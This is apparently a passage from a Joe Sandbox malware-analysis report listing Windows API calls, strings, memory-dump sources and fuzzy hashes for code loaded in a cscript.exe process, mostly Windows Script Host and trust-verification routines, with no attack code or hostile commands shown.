                                                      • GetProcAddress.KERNEL32(?,WintrustGetRegPolicyFlags), ref: 006346C0
                                                      • GetProcAddress.KERNEL32(?,WintrustSetRegPolicyFlags), ref: 006346D5
                                                      • wcsrchr.MSVCRT ref: 006346F4
                                                      • CloseHandle.KERNEL32(00000000,00000000,?,00000000), ref: 00634824
                                                      • FreeLibrary.KERNEL32(00000000,00000000,?,00000000), ref: 00634833
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3819091471.0000000000620000.00000040.80000000.00040000.00000000.sdmp, Offset: 00620000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_620000_cscript.jbxd
                                                      Similarity
                                                      • API ID: AddressProc$DirectoryLibrarySystemstrcpy_s$CloseErrorFreeHandleLastLoadwcsrchr
                                                      • String ID: 4$WinVerifyTrust$WintrustGetRegPolicyFlags$WintrustSetRegPolicyFlags$wintrust.dll
                                                      • API String ID: 3203503508-3152921320
                                                      • Opcode ID: 832638981188ce40fa778ddb80ab2294f2e84399b598cc1968c66f46fbb6e798
                                                      • Instruction ID: 497ff13d590dac09676bd7fa1eeb3a349fb8b07d8f0d274321808c4ad88bc41e
                                                      • Opcode Fuzzy Hash: 832638981188ce40fa778ddb80ab2294f2e84399b598cc1968c66f46fbb6e798
                                                      • Instruction Fuzzy Hash: 6A612875D012199BCB10DFA9D884AEEFBF6FF49310F25402AE915B7350DB35A9428F90
                                                      APIs
                                                      • LoadLibraryExW.KERNEL32(?,00000000,00000000,00000000,?,00000000), ref: 006384A1
                                                      • SearchPathW.KERNEL32(00000000,?,00000000,00000104,?,00000000,?,00000000), ref: 006384D4
                                                      • FindResourceExW.KERNEL32(00000000,MUI,00000001,00000000,?,00000000), ref: 00638512
                                                      • GetUserDefaultUILanguage.KERNEL32(?,00000000), ref: 0063853C
                                                      • GetSystemDefaultUILanguage.KERNEL32(?,00000000,?,00000000,?,?,?,00000000), ref: 00638607
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3819091471.0000000000620000.00000040.80000000.00040000.00000000.sdmp, Offset: 00620000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_620000_cscript.jbxd
                                                      Similarity
                                                      • API ID: DefaultLanguage$FindLibraryLoadPathResourceSearchSystemUser
                                                      • String ID: %s\%s$MUI
                                                      • API String ID: 1597595625-2651373239
                                                      • Opcode ID: 6069503bfd70851bb43deef0e07b3045ae792ece7907d7a75b7d115c18a684d0
                                                      • Instruction ID: 08f478e40e5b7a0808db20ae22cee658bd6d674c1d94a5ae38014970f2a60d69
                                                      • Opcode Fuzzy Hash: 6069503bfd70851bb43deef0e07b3045ae792ece7907d7a75b7d115c18a684d0
                                                      • Instruction Fuzzy Hash: F1B182B1A003699FCF759B208C54BEA73BBAB84304F0444E9F949A7251DF308E858FE5
                                                      APIs
                                                        • Part of subcall function 00628103: RegOpenKeyExW.ADVAPI32(80000000,?,00000000,00020019,?,?,?,?,80000000,80000000,?,00627F9E,?,?,?,?), ref: 00628134
                                                        • Part of subcall function 00628070: RegQueryValueExW.ADVAPI32(?,00000000,00000000,?,?,?,?,?,?,?,?,?), ref: 006280BD
                                                      • RegCloseKey.ADVAPI32(?,?,00000400,?,?,?,?,?), ref: 00627FC5
                                                      • wcscat_s.MSVCRT ref: 00627FE4
                                                      • RegOpenKeyExW.ADVAPI32(80000000,?,00000000,00020019,?), ref: 00628014
                                                      • RegCloseKey.ADVAPI32(?,?,00000100), ref: 00628037
                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000), ref: 00630356
                                                      • GetLastError.KERNEL32 ref: 00630362
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3819091471.0000000000620000.00000040.80000000.00040000.00000000.sdmp, Offset: 00620000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_620000_cscript.jbxd
                                                      Similarity
                                                      • API ID: CloseOpen$ByteCharErrorLastMultiQueryValueWidewcscat_s
                                                      • String ID: \ScriptEngine
                                                      • API String ID: 131889256-4133095719
                                                      • Opcode ID: 788d6d255afcd2b590dcf9eae3e8c852437c94322ba8d426317304c7adb3919a
                                                      • Instruction ID: 0a36c78e57003f36c4b4bdd00a642d7e626cca252af6b80a3c7963a231139a60
                                                      • Opcode Fuzzy Hash: 788d6d255afcd2b590dcf9eae3e8c852437c94322ba8d426317304c7adb3919a
                                                      • Instruction Fuzzy Hash: 81410930B01235AFEB305B60AC45FA676EABB08714F144158BA45E71C0DEB1DD48DFE5
                                                      APIs
                                                      • GetFileVersionInfoSizeW.VERSION(?,?,-00000001,?,-00000004,?,?,?,006271CB,?), ref: 0062A82D
                                                      • __alloca_probe_16.LIBCMT ref: 0062A83D
                                                      • GetFileVersionInfoW.VERSION(?,?,00000000,?,?,?,?,006271CB,?), ref: 0062A84F
                                                      • VerQueryValueW.VERSION(006271CB,00623A2C,?,?,?,?,?,?,006271CB,?), ref: 0062A86D
                                                      • GetLastError.KERNEL32(?,?,?,006271CB,?), ref: 00630C2F
                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000,-00000001,?,-00000004,?,?,?,006271CB,?), ref: 00630C59
                                                      • __alloca_probe_16.LIBCMT ref: 00630C66
                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,006271CB,00000000,00000000,?,?,?,006271CB,?), ref: 00630C8D
                                                      • GetFileVersionInfoSizeA.VERSION(?,?,?,006271CB,00000000,00000000,?,?,?,006271CB,?), ref: 00630C9F
                                                      • __alloca_probe_16.LIBCMT ref: 00630CAC
                                                      • GetFileVersionInfoA.VERSION(?,?,006271CB,?,?,006271CB,00000000,00000000,?,?,?,006271CB,?), ref: 00630CBE
                                                      • VerQueryValueA.VERSION(?,00623A90,?,?,?,?,006271CB,00000000,00000000,?,?,?,006271CB,?), ref: 00630CDC
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3819091471.0000000000620000.00000040.80000000.00040000.00000000.sdmp, Offset: 00620000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_620000_cscript.jbxd
                                                      Similarity
                                                      • API ID: FileInfoVersion$__alloca_probe_16$ByteCharMultiQuerySizeValueWide$ErrorLast
                                                      • String ID:
                                                      • API String ID: 467288509-0
                                                      • Opcode ID: a478b5542222eb83183287f9a44f6add089fd42e6d65dedfda161e052daaf71c
                                                      • Instruction ID: bfa9a9f187000ae8c25fbef36a82df7f9dc0240513c1c21e4d67d968ea215a9d
                                                      • Opcode Fuzzy Hash: a478b5542222eb83183287f9a44f6add089fd42e6d65dedfda161e052daaf71c
                                                      • Instruction Fuzzy Hash: EE41A370A00219ABDB109FA5DC05BEFBBBAEF04710F241165F911E6290DB719A019FE5
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3820853738.0000000004B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B60000, based on PE: true
                                                      • Associated: 00000005.00000002.3820853738.0000000004C89000.00000040.00001000.00020000.00000000.sdmp
                                                      • Associated: 00000005.00000002.3820853738.0000000004C8D000.00000040.00001000.00020000.00000000.sdmp
                                                      • Associated: 00000005.00000002.3820853738.0000000004CFE000.00000040.00001000.00020000.00000000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_4b60000_cscript.jbxd
                                                      Similarity
                                                      • API ID: ___swprintf_l
                                                      • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                      • API String ID: 48624451-2108815105
                                                      • Opcode ID: 17022c22d25edf3185e5bbf990b626ffc11cada1a526022205cd4c61c978fdc4
                                                      • Instruction ID: 636d964d1d49422f2b745b17b102a95622faf81f9a19f53d5bbffc03fca3a9af
                                                      • Opcode Fuzzy Hash: 17022c22d25edf3185e5bbf990b626ffc11cada1a526022205cd4c61c978fdc4
                                                      • Instruction Fuzzy Hash: F451F4B6A04256BFDB24DFA8C88097EF7B8FF5820471081F9E455D3645E275FE508BA0
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3820853738.0000000004B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B60000, based on PE: true
                                                      • Associated: 00000005.00000002.3820853738.0000000004C89000.00000040.00001000.00020000.00000000.sdmp
                                                      • Associated: 00000005.00000002.3820853738.0000000004C8D000.00000040.00001000.00020000.00000000.sdmp
                                                      • Associated: 00000005.00000002.3820853738.0000000004CFE000.00000040.00001000.00020000.00000000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_4b60000_cscript.jbxd
                                                      Similarity
                                                      • API ID: ___swprintf_l
                                                      • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                      • API String ID: 48624451-2108815105
                                                      • Opcode ID: 32f48be4bde5da122528b8f6ee6f6a08798b368e2e3ce8a1e758bb2b39470e14
                                                      • Instruction ID: 87de1014cf5d70382c45bca69e5da9a8ddf8866a4922d074ff8aa185092ee09b
                                                      • Opcode Fuzzy Hash: 32f48be4bde5da122528b8f6ee6f6a08798b368e2e3ce8a1e758bb2b39470e14
                                                      • Instruction Fuzzy Hash: 84510375A00645AFDB30DE9DCA9197FB7FAEF84244B048499F496D3641E6B4FB00CB60
                                                      APIs
                                                      • GetClassInfoA.USER32(00000000,WSH-Timer,?), ref: 0062C3B4
                                                      • RegisterClassA.USER32(?), ref: 0062C3DE
                                                      • CreateWindowExA.USER32(00000000,00623ADC,00000000,00000000,00000000,00000000,00000001,00000001,00000000,00000000,?), ref: 0062C409
                                                      • SetEvent.KERNEL32(?), ref: 0062C424
                                                      • GetMessageA.USER32(?,?,00000000,00000000), ref: 0062C434
                                                      • DispatchMessageA.USER32(?), ref: 0062C449
                                                      • GetMessageA.USER32(?,?,00000000,00000000), ref: 0062C459
                                                      • SetEvent.KERNEL32(?), ref: 00631788
                                                      • GetLastError.KERNEL32 ref: 0063178E
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3819091471.0000000000620000.00000040.80000000.00040000.00000000.sdmp, Offset: 00620000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_620000_cscript.jbxd
                                                      Similarity
                                                      • API ID: Message$ClassEvent$CreateDispatchErrorInfoLastRegisterWindow
                                                      • String ID: WSH-Timer
                                                      • API String ID: 1152382880-2323048385
                                                      • Opcode ID: 7c81fd28ed56a556ef08c73b73dc66b7912a88d47ca5d1034172dac75f32f746
                                                      • Instruction ID: e3d8beae2b98b9d9b1151c39dbf9e490f3ef00bd70f5d90f97fcc758095f882f
                                                      • Opcode Fuzzy Hash: 7c81fd28ed56a556ef08c73b73dc66b7912a88d47ca5d1034172dac75f32f746
                                                      • Instruction Fuzzy Hash: A3314A70A04319AFDB209FE4EC49B9E7BFABB08710F244119F555E6290E7B5A5019F90
                                                      APIs
                                                      • GetVersionExA.KERNEL32(?,?,00000000,?), ref: 0062B3E6
                                                      • IsTextUnicode.ADVAPI32(?,?,?), ref: 0062B414
                                                      • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,?,00000000,?), ref: 0062B439
                                                      • SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 0062B456
                                                      • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,?,?,00000000,00000000,?,00000000,?), ref: 0062B480
                                                      • memmove.MSVCRT ref: 0062B4F8
                                                      • SysAllocString.OLEAUT32(00623CB4), ref: 00631298
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3819091471.0000000000620000.00000040.80000000.00040000.00000000.sdmp, Offset: 00620000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_620000_cscript.jbxd
                                                      Similarity
                                                      • API ID: AllocByteCharMultiStringWide$TextUnicodeVersionmemmove
                                                      • String ID:
                                                      • API String ID: 2776485773-0
                                                      • Opcode ID: 3346886ec1ac64667748ffa57277839e2b6457b0b9a7be4e5910f022cb03fa1f
                                                      • Instruction ID: e6218fdcb21be3ecdb5f69c9dfeca73b087291b85cecc4794ff44354f1792df6
                                                      • Opcode Fuzzy Hash: 3346886ec1ac64667748ffa57277839e2b6457b0b9a7be4e5910f022cb03fa1f
                                                      • Instruction Fuzzy Hash: 0151B570900A25DBEB309F25DC49BEA77B6EF02314F105095EC49AB355C7748D85DFA1
                                                      APIs
                                                      • GetWindowLongA.USER32(?,000000EB), ref: 0062C2AE
                                                      • DefWindowProcA.USER32(?,?,?,?), ref: 0062C302
                                                      • SetWindowLongA.USER32(?,000000EB,?), ref: 0062C33C
                                                      • DefWindowProcA.USER32(?,?,?,?), ref: 0062C351
                                                      • KillTimer.USER32(?,?), ref: 00631703
                                                      • GetLastError.KERNEL32 ref: 0063170D
                                                      • SetTimer.USER32(?,19771215,?,00000000), ref: 00631738
                                                      • GetLastError.KERNEL32 ref: 00631745
                                                      • KillTimer.USER32(?,?), ref: 00631762
                                                      • GetLastError.KERNEL32 ref: 0063176C
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3819091471.0000000000620000.00000040.80000000.00040000.00000000.sdmp, Offset: 00620000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_620000_cscript.jbxd
                                                      Similarity
                                                      • API ID: Window$ErrorLastTimer$KillLongProc
                                                      • String ID:
                                                      • API String ID: 3749527857-0
                                                      • Opcode ID: 4580a3c10d567fc5cf515cbfe8ba274833d21a2b8ae4f85e0f216a82063c4979
                                                      • Instruction ID: 9d19a71a438df033ef4fdac8123d27dbdb6e56793caf98de32299cefe17075e0
                                                      • Opcode Fuzzy Hash: 4580a3c10d567fc5cf515cbfe8ba274833d21a2b8ae4f85e0f216a82063c4979
                                                      • Instruction Fuzzy Hash: D7410971100612EFDB109F58EC48BAEBB6BFF45361F148521F856D6260C7728911EFE1
                                                      APIs
                                                      • GetModuleHandleA.KERNEL32(00000000), ref: 00626E75
                                                        • Part of subcall function 0062A9C0: InitializeCriticalSection.KERNEL32(00639498,00638AD8,000000A0,00626E82), ref: 0062A9E8
                                                        • Part of subcall function 0062A9C0: GetVersionExA.KERNEL32(00000094), ref: 0062AA06
                                                      • GetCommandLineW.KERNEL32 ref: 00626E97
                                                      • __alloca_probe_16.LIBCMT ref: 00626EC5
                                                      • wcscpy_s.MSVCRT ref: 00626ECF
                                                      • __alloca_probe_16.LIBCMT ref: 00626EE8
                                                      • ExitProcess.KERNEL32 ref: 00626F10
                                                      • ExitProcess.KERNEL32 ref: 0062EB76
                                                      • GetCommandLineA.KERNEL32 ref: 0062EB7C
                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000), ref: 0062EB8F
                                                      • __alloca_probe_16.LIBCMT ref: 0062EB9A
                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,00000000), ref: 0062EBAA
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3819091471.0000000000620000.00000040.80000000.00040000.00000000.sdmp, Offset: 00620000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_620000_cscript.jbxd
                                                      Similarity
                                                      • API ID: __alloca_probe_16$ByteCharCommandExitLineMultiProcessWide$CriticalHandleInitializeModuleSectionVersionwcscpy_s
                                                      • String ID:
                                                      • API String ID: 1664898510-0
                                                      • Opcode ID: 642a1d785c0ed04520ff045f0072c317fcefdbc6b9a8363466028a6c103daed2
                                                      • Instruction ID: 001e4c505c1f8c1010eccaf8abe57727a47bb65993166086cc60047ebc388ed0
                                                      • Opcode Fuzzy Hash: 642a1d785c0ed04520ff045f0072c317fcefdbc6b9a8363466028a6c103daed2
                                                      • Instruction Fuzzy Hash: F7212931204A20ABD7242B75ED09B6B3A9BAF89714F24012CF546872D5DE715C018FE5
                                                      APIs
                                                        • Part of subcall function 0062DBC0: malloc.MSVCRT ref: 0062DBD8
                                                      • SafeArrayCreate.OLEAUT32(0000000C,00000001,?), ref: 00629F89
                                                      • SafeArrayCreate.OLEAUT32(0000000C,00000001,?), ref: 00629FA2
                                                      • SysAllocStringLen.OLEAUT32(?,00000000), ref: 0062A065
                                                      • SafeArrayPutElement.OLEAUT32(00000000,?,?), ref: 0062A081
                                                      • VariantClear.OLEAUT32(?), ref: 0062A08E
                                                      • SysAllocString.OLEAUT32(?), ref: 0062A0B7
                                                      • SafeArrayPutElement.OLEAUT32(?,?,?), ref: 0062A0D3
                                                      • VariantClear.OLEAUT32(?), ref: 0062A0E0
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3819091471.0000000000620000.00000040.80000000.00040000.00000000.sdmp, Offset: 00620000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_620000_cscript.jbxd
                                                      Similarity
                                                      • API ID: ArraySafe$AllocClearCreateElementStringVariant$malloc
                                                      • String ID: -
                                                      • API String ID: 2320673430-2547889144
                                                      • Opcode ID: 6c05bade719826bde34081d9fde7bfcdd60307b2f7dc31cfe18f2c7046c97d7a
                                                      • Instruction ID: 36ddb3c7d051632761e4bfcbb7dc0dbadd941c9757291628493c10a354ca39fc
                                                      • Opcode Fuzzy Hash: 6c05bade719826bde34081d9fde7bfcdd60307b2f7dc31cfe18f2c7046c97d7a
                                                      • Instruction Fuzzy Hash: FC815971E006199BDB14CFE8E8946EEBBB6FF48304F24802AE501E7390D7759A45CFA5
                                                      APIs
                                                      • RegQueryValueExW.ADVAPI32(00000001,Enabled,00000000,?,?,?,00000000,00000001,Enabled), ref: 00627945
                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,Enabled,000000FF,00000000,00000000,00000000,00000000,00000000,00000001,Enabled), ref: 0062FD6B
                                                      • __alloca_probe_16.LIBCMT ref: 0062FD7B
                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,Enabled,000000FF,?,?,00000000,00000000), ref: 0062FD9A
                                                      • RegQueryValueExA.ADVAPI32(00000001,00000000,00000000,?,?,?,00000000,00000001,Enabled), ref: 0062FDDE
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3819091471.0000000000620000.00000040.80000000.00040000.00000000.sdmp, Offset: 00620000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_620000_cscript.jbxd
                                                      Similarity
                                                      • API ID: ByteCharMultiQueryValueWide$__alloca_probe_16
                                                      • String ID: Enabled$false
                                                      • API String ID: 1757841119-109718029
                                                      • Opcode ID: 5bbc700024036634bb4ee6979add5e4508482947f67282b38e34974850cc1bdd
                                                      • Instruction ID: 920ae19229a271a67b83904d46439d3efe476015b3d8082aea333fc693f17a6f
                                                      • Opcode Fuzzy Hash: 5bbc700024036634bb4ee6979add5e4508482947f67282b38e34974850cc1bdd
                                                      • Instruction Fuzzy Hash: 7151EA70904639ABEB348B24EC41FEA777A9F05320F2007A5E655E62D1DF309EC5CE65
                                                      APIs
                                                      • RegOpenKeyExA.ADVAPI32(80000000,0000002E,00000000,00020019,?), ref: 0063292F
                                                      • RegQueryValueExA.ADVAPI32(?,00623EFE,00000000,00000000,?,00000104), ref: 00632964
                                                      • RegCloseKey.ADVAPI32(?), ref: 00632972
                                                      • RegEnumKeyExA.ADVAPI32(80000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 006329D2
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3819091471.0000000000620000.00000040.80000000.00040000.00000000.sdmp, Offset: 00620000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_620000_cscript.jbxd
                                                      Similarity
                                                      • API ID: CloseEnumOpenQueryValue
                                                      • String ID: .$Open$Open2$WSFFile$WSHFile
                                                      • API String ID: 3984146545-2336295846
                                                      • Opcode ID: 99b778588df7c18b7df1267ce8e7534bdd0a9ef8722da346fa021482abe6b058
                                                      • Instruction ID: 7d0b017b0b3a57a20c403f80bbfac73e96f92ab69553dcaa50530e686958b09a
                                                      • Opcode Fuzzy Hash: 99b778588df7c18b7df1267ce8e7534bdd0a9ef8722da346fa021482abe6b058
                                                      • Instruction Fuzzy Hash: DD31FAB1A0012B6BE7209B51DC59BFB76AEEB20704F2000A9E545D6180D7B49E848FA1
                                                      APIs
                                                        • Part of subcall function 0062A6F5: LoadStringW.USER32(?,?,00000800,00000C89), ref: 0062A737
                                                        • Part of subcall function 0062A6F5: SysAllocString.OLEAUT32(?), ref: 0062A74A
                                                      • GetStdHandle.KERNEL32(000000F5,?,?), ref: 0062B978
                                                        • Part of subcall function 0062B9F0: GetProcessHeap.KERNEL32(00000000,?,00000000,00000000,?), ref: 0062BAA7
                                                        • Part of subcall function 0062B9F0: HeapAlloc.KERNEL32(00000000), ref: 0062BAAE
                                                      • SysFreeString.OLEAUT32(?), ref: 0062B98A
                                                      • SysFreeString.OLEAUT32(00000000), ref: 0062B991
                                                      • SysFreeString.OLEAUT32(00000000), ref: 0062B998
                                                        • Part of subcall function 0062BCDF: FormatMessageW.KERNEL32(00000500,?,00000000,00000000,?,00000000,?,00000000,?,00000000,0062B95E,?), ref: 0062BD1E
                                                        • Part of subcall function 0062BCDF: SysAllocString.OLEAUT32(?), ref: 0062BD2F
                                                        • Part of subcall function 0062BCDF: LocalFree.KERNEL32(00000000,?,00000000,0062B95E,?), ref: 0062BD51
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3819091471.0000000000620000.00000040.80000000.00040000.00000000.sdmp, Offset: 00620000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_620000_cscript.jbxd
                                                      Similarity
                                                      • API ID: String$Free$Alloc$Heap$FormatHandleLoadLocalMessageProcess
                                                      • String ID:
                                                      • API String ID: 1815185728-0
                                                      • Opcode ID: 797b88dacf07a0eb92d7a5e4f1882df1a3322384616039bd317b9d4c92ec7ca5
                                                      • Instruction ID: d575898ca89cc3a603303599b57a080515ddd920265f5b612275c8e5fbcb128c
                                                      • Opcode Fuzzy Hash: 797b88dacf07a0eb92d7a5e4f1882df1a3322384616039bd317b9d4c92ec7ca5
                                                      • Instruction Fuzzy Hash: 4C315C71E00219AFCB10DFA5DC888AFBBBAFF49354B145169E901A7211DB319A41DFA1
                                                      Strings
                                                      • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 04C04655
                                                      • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 04C046FC
                                                      • ExecuteOptions, xrefs: 04C046A0
                                                      • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 04C04725
                                                      • CLIENT(ntdll): Processing section info %ws..., xrefs: 04C04787
                                                      • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 04C04742
                                                      • Execute=1, xrefs: 04C04713
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3820853738.0000000004B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B60000, based on PE: true
                                                      • Associated: 00000005.00000002.3820853738.0000000004C89000.00000040.00001000.00020000.00000000.sdmp
                                                      • Associated: 00000005.00000002.3820853738.0000000004C8D000.00000040.00001000.00020000.00000000.sdmp
                                                      • Associated: 00000005.00000002.3820853738.0000000004CFE000.00000040.00001000.00020000.00000000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_4b60000_cscript.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                      • API String ID: 0-484625025
                                                      • Opcode ID: 0c64a6a8cbd2cf87952dc05453b728b6a46c67871c4f24722777b2106ebd52a9
                                                      • Instruction ID: a00962b534e47bf14bdf1a2f9337bc7ec2f7b58ef91a66ce4d47c0963416acd6
                                                      • Opcode Fuzzy Hash: 0c64a6a8cbd2cf87952dc05453b728b6a46c67871c4f24722777b2106ebd52a9
                                                      • Instruction Fuzzy Hash: 3E51D63164021A6BEB14ABA8DC89BAA77A9EB05304F1400EDE505A7290EB70BE459F64
                                                      APIs
                                                      • GetProcAddress.KERNEL32(?,WinVerifyTrust), ref: 00634930
                                                      • GetLastError.KERNEL32 ref: 0063493C
                                                      • GetLastError.KERNEL32 ref: 00634990
                                                      • FreeLibrary.KERNEL32(?,00000000,?,00000000), ref: 006349AE
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3819091471.0000000000620000.00000040.80000000.00040000.00000000.sdmp, Offset: 00620000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_620000_cscript.jbxd
                                                      Similarity
                                                      • API ID: ErrorLast$AddressFreeLibraryProc
                                                      • String ID: ($4$WinVerifyTrust$wintrust.dll
                                                      • API String ID: 1171437518-2532474036
                                                      • Opcode ID: ebec34a26f7b446f24f724db96fbbd65ef0a8479f2f1ce5ca56064b13b37769a
                                                      • Instruction ID: 9e96b7b0b98e9d3fe2cf2009a05dbe1059bf783cf35861771e171ca56ef40b81
                                                      • Opcode Fuzzy Hash: ebec34a26f7b446f24f724db96fbbd65ef0a8479f2f1ce5ca56064b13b37769a
                                                      • Instruction Fuzzy Hash: D94109B6D017298BCB10CF99988069EFBB6BF44710F11422ED915BB380DB74A9058FD1
                                                      APIs
                                                      • LoadLibraryExW.KERNEL32(WLDP.DLL,00000000,00000800,?,00000000,?,00627DA1,?,?,?,?,?,?,?), ref: 0062B1E9
                                                      • GetProcAddress.KERNEL32(00000000,WldpGetLockdownPolicy), ref: 0062B1FF
                                                      • GetProcAddress.KERNEL32(00000000,WldpIsClassInApprovedList), ref: 0062B216
                                                      • FreeLibrary.KERNEL32(00000000,?,?,?), ref: 0062B2B6
                                                      • GetLastError.KERNEL32(?,?,?), ref: 0063124B
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3819091471.0000000000620000.00000040.80000000.00040000.00000000.sdmp, Offset: 00620000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_620000_cscript.jbxd
                                                      Similarity
                                                      • API ID: AddressLibraryProc$ErrorFreeLastLoad
                                                      • String ID: WLDP.DLL$WldpGetLockdownPolicy$WldpIsClassInApprovedList
                                                      • API String ID: 1004692917-3104440107
                                                      • Opcode ID: d1b8a607a157d37d95983e2ee1802af1b7a66fb84153eb153e4d31ce8459f526
                                                      • Instruction ID: c99fad50b3e6d19a01766403ab00a7f5efa8468db8d63b6a413b0e2cbb202f0d
                                                      • Opcode Fuzzy Hash: d1b8a607a157d37d95983e2ee1802af1b7a66fb84153eb153e4d31ce8459f526
                                                      • Instruction Fuzzy Hash: 2421A271901B26DBC7118F9498887BEBBB6EB44710F258029ED19EB350DB34DA809FD1
                                                      APIs
                                                        • Part of subcall function 0062C93B: memcmp.MSVCRT ref: 0062C93F
                                                      • VariantClear.OLEAUT32(?), ref: 00633469
                                                      • SysFreeString.OLEAUT32(00000000), ref: 0063349B
                                                      • SysFreeString.OLEAUT32(?), ref: 006334A9
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3819091471.0000000000620000.00000040.80000000.00040000.00000000.sdmp, Offset: 00620000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_620000_cscript.jbxd
                                                      Similarity
                                                      • API ID: FreeString$ClearVariantmemcmp
                                                      • String ID:
                                                      • API String ID: 1922676145-0
                                                      • Opcode ID: f4a029d92ddbfccd64787d6ae3e95596413246a280a72de752a248d083ef974c
                                                      • Instruction ID: a6cd720c1349ac99a71ddaa2506051056bd079a8e6f5b3a4e9235a9d692fa351
                                                      • Opcode Fuzzy Hash: f4a029d92ddbfccd64787d6ae3e95596413246a280a72de752a248d083ef974c
                                                      • Instruction Fuzzy Hash: BBC17F75E00229AFCF14CF98D885AAEBBB6FF48310F158169E905AB351D7319E42DBD0
                                                      APIs
                                                      • GetFullPathNameW.KERNEL32(0062ECAE,00000104,?,?,?,?,?,?,?,?), ref: 00628188
                                                      • GetLastError.KERNEL32 ref: 006304DC
                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,0062ECAE,000000FF,00000000,00000000,00000000,00000000,?,?,?,?,?,?), ref: 00630503
                                                      • __alloca_probe_16.LIBCMT ref: 0063050F
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3819091471.0000000000620000.00000040.80000000.00040000.00000000.sdmp, Offset: 00620000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_620000_cscript.jbxd
                                                      Similarity
                                                      • API ID: ByteCharErrorFullLastMultiNamePathWide__alloca_probe_16
                                                      • String ID:
                                                      • API String ID: 187176378-0
                                                      • Opcode ID: b687e1b374f929a9ced613b285500b4fa60ee262f7cdca833cf06a7b28b65009
                                                      • Instruction ID: f4bedcaa9eac758cd7402190a3dbbbb4e3fd3c878eb0cf16474ab1bbe49c20a0
